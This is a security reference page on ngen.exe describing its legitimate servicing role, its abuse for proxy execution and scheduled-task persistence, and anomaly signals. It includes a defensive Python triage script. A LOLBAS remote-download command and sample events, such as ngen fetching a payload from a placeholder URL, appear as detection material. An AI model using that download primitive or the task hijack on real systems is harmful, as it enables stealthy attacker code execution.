ngen.exe

ngen.exe is the .NET Native Image Generator, which precompiles .NET assemblies to native code for faster startup. It runs as part of .NET servicing. Attackers abuse the scheduled tasks and execution paths around it to run code through a signed Microsoft binary.

File identity

File details

Not observed.

Signing information

Not observed.

File version

Not observed.

File size

Not observed.

Execution context

File paths

Not observed.

User context

Not observed.

Integrity level

Not observed.

Instances

Not observed.

Session

Not observed.

Token privileges

Not observed.

Ancestry

Parents

Not observed.

Children

Not observed.

Grandparents

Not observed.

Grandchildren

Not observed.

Behavior

Loaded modules

Not observed.

Named pipes

Not observed.

Process handles

Not observed.

Command-line patterns

Not observed.

LOLBAS
  • ngen.exe {REMOTEURL} · Download · It will download a remote payload and place it in INetCache.

Indicators

Hashes

Not observed.

Analysis

About this process

ngen.exe compiles managed assemblies into native images and maintains those images, work normally driven by .NET setup and by the ".NET Framework NGEN" scheduled tasks that run during idle time. It ships with the .NET Framework, so the genuine binary lives in a versioned subdirectory of C:\Windows\Microsoft.NET\Framework and Framework64 (for example v4.0.30319), never in System32.

Legitimately, ngen runs automatically after .NET updates and during maintenance windows, parented by the Task Scheduler service (an svchost.exe instance). Installers and developer tooling also call it directly to pre-compile their own assemblies, so the question is always who launched it and what it was pointed at: interactive or oddly-parented invocations are what give an instance meaning.

Security notes

ngen.exe is a system binary proxy (T1218, System Binary Proxy Execution) and, through its scheduled tasks, a persistence aid (T1053.005, Scheduled Task). Because it loads and compiles arbitrary .NET assemblies, and will fetch a remote payload into INetCache when handed a URL, it has been used to stage and run attacker code under a trusted, signed Microsoft binary, slipping past application-control rules that allow the .NET tooling. The built-in NGEN scheduled tasks under \Microsoft\Windows\.NET Framework\ run as SYSTEM during idle time, so repointing their action at attacker code gives SYSTEM-context execution that blends into normal maintenance.

Because ngen almost always runs as part of .NET servicing or an installer, an ngen invoked interactively, parented by an Office application or a script host, or pointed at an assembly in a user-writable path is what separates abuse from routine native-image generation. A URL on the command line is never legitimate; that is the download primitive LOLBAS documents.

Anomaly signals
  • Image path outside the Microsoft.NET\Framework directories (high)
  • Invoked to execute an assembly from a user-writable path (high)
  • Parent is an Office application, a script host, cmd.exe, or powershell.exe (high)
  • The NGEN scheduled tasks modified to point at attacker code (high)
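The following is an added example, not code from this page or from Microsoft, that turns the anomaly signals above and the abuse notes in the security section into a small triage routine. It runs offline over constructed Sysmon-like process-creation records and a constructed Task Scheduler XML fragment; the record field names (image, parent_image, command_line), the list of user-writable prefixes, and the %SystemRoot% normalisation are assumptions to adapt to your own telemetry.

```python
"""Triage ngen.exe activity against the anomaly signals listed on this page.

Added example, not code from the page or from Microsoft. It runs offline over
constructed process-creation records and a constructed Task Scheduler XML
fragment. The record field names (image, parent_image, command_line) are an
assumed Sysmon-like event shape; map them to your own telemetry source.
"""
import ntpath
import re
import xml.etree.ElementTree as ET

# Genuine binary: C:\Windows\Microsoft.NET\Framework{,64}\v<version>\ngen.exe
GENUINE_IMAGE = re.compile(
    r"^c:\\windows\\microsoft\.net\\framework(64)?\\v[\d.]+\\ngen\.exe$", re.I)

# Parents that have no business driving native-image generation.
SUSPICIOUS_PARENTS = {
    "winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "wscript.exe",
    "cscript.exe", "mshta.exe", "cmd.exe", "powershell.exe", "pwsh.exe",
}

# Prefixes a standard user can write to (assumed list; extend for your estate).
USER_WRITABLE = re.compile(r"^(c:\\users\\|c:\\programdata\\|c:\\windows\\temp\\|\\\\)", re.I)
REMOTE_URL = re.compile(r"^https?://", re.I)

# Task Scheduler XML namespace.
TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}


def split_args(command_line):
    """Split a Windows command line into arguments, dropping argv[0] and quotes."""
    tokens = re.findall(r'"[^"]*"|\S+', command_line)
    return [t.strip('"') for t in tokens[1:]]


def triage(event):
    """Return the high-severity signals one ngen.exe process-creation event trips."""
    signals = []
    if not GENUINE_IMAGE.match(event["image"]):
        signals.append("image outside Microsoft.NET\\Framework: " + event["image"])
    parent = ntpath.basename(event["parent_image"])
    if parent.lower() in SUSPICIOUS_PARENTS:
        signals.append("suspicious parent: " + parent)
    for arg in split_args(event["command_line"]):
        if USER_WRITABLE.match(arg):
            signals.append("assembly in user-writable path: " + arg)
        elif REMOTE_URL.match(arg):
            signals.append("remote URL on command line (LOLBAS download): " + arg)
    return signals


def audit_task_xml(xml_text):
    """Flag Exec actions in an NGEN task definition that do not run the genuine ngen.exe.

    A task whose action is a COM handler rather than Exec produces no finding here.
    """
    findings = []
    for exec_node in ET.fromstring(xml_text).iterfind(".//t:Actions/t:Exec", TASK_NS):
        command = exec_node.findtext("t:Command", default="", namespaces=TASK_NS).strip('"')
        # Assumed normalisation: task actions commonly use %SystemRoot% or %windir%.
        command = re.sub(r"%(systemroot|windir)%", r"c:\\windows", command, flags=re.I)
        if not GENUINE_IMAGE.match(command):
            findings.append("task action runs " + command)
    return findings


# Constructed sample records (not captured telemetry).
SAMPLE_EVENTS = [
    {   # routine: Task Scheduler (hosted in svchost.exe) draining the NGEN queue
        "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe",
        "parent_image": r"C:\Windows\System32\svchost.exe",
        "command_line": r'"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe" ExecuteQueuedItems',
    },
    {   # Office parent installing an assembly dropped in the user's Temp directory
        "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe",
        "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
        "command_line": r'ngen.exe install "C:\Users\alice\AppData\Local\Temp\update.dll"',
    },
    {   # a copy of ngen.exe running from outside Microsoft.NET\Framework
        "image": r"C:\Users\alice\Downloads\ngen.exe",
        "parent_image": r"C:\Windows\explorer.exe",
        "command_line": r"C:\Users\alice\Downloads\ngen.exe display",
    },
    {   # the LOLBAS download pattern launched from a shell
        "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe",
        "parent_image": r"C:\Windows\System32\cmd.exe",
        "command_line": r"ngen.exe https://example.invalid/payload",
    },
]

# Constructed task fragment: an NGEN task whose action was repointed at a user-writable copy.
SAMPLE_TASK_XML = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Actions Context="LocalSystem">
    <Exec>
      <Command>C:\\Users\\Public\\ngen.exe</Command>
      <Arguments>ExecuteQueuedItems</Arguments>
    </Exec>
  </Actions>
</Task>"""

if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        print(event["command_line"], "->", triage(event) or ["no signals"])
    print("task audit ->", audit_task_xml(SAMPLE_TASK_XML))
```

To audit the real tasks, export each definition under \Microsoft\Windows\.NET Framework\ (for example with schtasks /query /xml) and pass the text to audit_task_xml; exported task XML is UTF-16 with an XML declaration, so decode it before parsing. The first sample record trips nothing because the Task Scheduler parent, the genuine image path and a queue-draining verb are exactly what routine servicing looks like; the other three each trip one or two of the signals listed above.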

Telemetry

OS prevalence

Not observed.

Observation timeline

Not observed.

References
